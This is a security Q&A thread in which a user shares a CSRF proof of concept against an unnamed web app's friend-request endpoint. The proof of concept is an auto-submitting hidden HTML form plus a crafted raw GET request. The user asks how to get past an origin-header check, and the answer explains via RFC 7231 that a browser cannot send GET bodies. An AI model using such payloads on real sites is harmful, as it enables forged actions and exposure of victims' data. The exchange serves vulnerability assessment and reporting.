# CSRF: GET request with POST data?

Tags: web-application, network, javascript, csrf, html

I have stumbled upon a vulnerability in a web application and was wondering if it was exploitable / worth reporting. The bug is a [CSRF](https://en.wikipedia.org/wiki/Cross-site_request_forgery) which would allow an attacker to send friend requests to himself from other user accounts (in turn letting him view sensitive information about the victim accounts). The request is usually made using a `POST` request. Using usual exploitation techniques, I crafted the following webpage.

```
<html>
    <head></head>
    <body>
        <span>csrf test</span>

        <form action="http://vulnerable.com/friendRequest.asp" method="POST">
            <input type="hidden" name="MessageArea" value="this is a test of csrf">
            <input type="hidden" name="FriendName" value="testuser">
        </form>

        <script>
            document.forms[0].submit();
        </script>

    </body>
</html>
```

Unfortunately though, the website checks for the `origin` header in the request, so this payload doesn't work. Switching to a `GET` request and deleting the `origin` header actually sends the request successfully. The request looks like the following.

```
GET /friendRequest.asp HTTP/1.1
Host: www.vulnerable.com
User-Agent: Mozilla/5.0
... (no origin header)
Cookie: secret_cookie

MessageArea=this+is+a+test+for+csrf&FriendName=testuser
```

As you can see this is a `GET` request with `POST` data sent at the bottom. Unfortunately the request doesn't go through with the parameters in the URL like in a true `GET` request. Is there any way to use an external form (like the one above) to send a malformed `GET` request with POST data to achieve this `CSRF`? I have looked into `XMLHttpRequest` and `fetch` but I'm not sure that they are the right tools for the job.

Comment: This is entirely dependent on what the server does with the GET request you sent. Most likely it ignores the body (as Steffen mentioned).

Answer (score 2):

> Is there any way to use an external form (like the one above) to send a malformed GET request with POST data to achieve this CSRF

A GET request with a body has no meaning. To cite [RFC 7231 section 4.3.1](https://www.rfc-editor.org/rfc/rfc7231#section-4.3.1):

> A payload within a GET request message has no defined semantics;
> sending a payload body on a GET request might cause some existing
> implementations to reject the request.

Since it has no meaning you cannot send a GET request from a browser with a body.